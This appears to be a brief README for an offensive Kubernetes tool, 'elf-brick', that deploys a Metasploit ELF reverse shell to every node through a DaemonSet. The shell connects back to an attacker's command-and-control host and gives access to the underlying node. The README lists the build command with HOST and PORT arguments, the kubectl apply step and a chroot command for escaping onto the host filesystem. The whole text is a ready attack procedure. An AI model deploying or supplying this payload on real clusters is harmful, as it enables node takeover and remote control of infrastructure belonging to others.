Kubernetes Daemonset that deploys a Metasploit elf reverse shell back to your C&C and gives access to the underlying node. The Daemonset will deploy a reverse shell per node.
docker build -t elf-brick . --build-arg HOST="IP" --build-arg PORT="PORT"
kubectl apply -f daemonset.yaml
chroot /chroot